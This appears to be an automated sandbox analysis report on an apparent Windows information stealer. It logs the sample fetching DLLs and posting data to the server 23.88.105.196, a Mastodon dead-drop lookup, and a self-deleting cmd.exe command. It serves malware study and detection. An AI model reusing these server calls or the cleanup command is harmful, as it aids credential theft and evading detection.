22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:10 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:10 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:10 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:10 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.105.196
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: eo Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track versio equals www.facebook.com (Facebook)
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/1008
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/freebl3.dll
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/mozglue.dll
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/mozglue.dll$
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/msvcp140.dll
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/nss3.dll
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/nss3.dllO
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://23.88.105.196/softokn3.dll
                        Source: nss3[1].dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: nss3[1].dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: nss3[1].dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: nss3[1].dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: nss3[1].dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: nss3[1].dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: nss3[1].dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/plp
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: nss3[1].dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: nss3[1].dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: nss3[1].dll.1.drString found in binary or memory: http://ocsp.thawte.com0
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: http://service.real.cop
                        Source: nss3[1].dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: nss3[1].dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: nss3[1].dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                        Source: mozglue[1].dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: nss3[1].dll.1.drString found in binary or memory: http://www.mozilla.com0
                        Source: temp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: temp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: temp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: temp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: temp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
                        Source: temp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/tootsuite/mastodon
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpString found in binary or memory: https://joinmastodon.org/apps
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: https://mas.to
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpString found in binary or memory: https://mas.to/
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpString found in binary or memory: https://mas.to/avatars/original/missing.png
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpString found in binary or memory: https://mas.to/users/killern0
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpString found in binary or memory: https://mas.to/users/killern0/followers
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpString found in binary or memory: https://mas.to/users/killern0/following
                        Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmpString found in binary or memory: https://media.mas.to
                        Source: T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmpString found in binary or memory: https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c
                        Source: temp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: temp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: nss3[1].dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: temp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknownHTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                        Source: unknownDNS traffic detected: queries for: mas.to
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00410340 DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                        Source: global trafficHTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
                        Source: unknownHTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2
                        Source: T6zZFfRLqs.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00413270
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041E780
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00498990
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0041DBF0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00439000
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_004AD033
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_004690E0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_0049D0F0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00421200
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_004982C0
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_004B22EF
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00450340
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00421360
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: 1_2_00464400
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: String function: 00401020 appears 53 times
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeCode function: String function: 0049CF02 appears 36 times
                        Source: T6zZFfRLqs.exe, 00000001.00000003.373993056.00000000030AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs T6zZFfRLqs.exe
                        Source: T6zZFfRLqs.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: T6zZFfRLqs.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: T6zZFfRLqs.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: T6zZFfRLqs.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: T6zZFfRLqs.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: T6zZFfRLqs.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\T6zZFfRLqs.exe 'C:\Users\user\Desktop\T6zZFfRLqs.exe'
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im T6zZFfRLqs.exe /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                        Source: C:\Users\user\Desktop\T6zZFfRLqs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
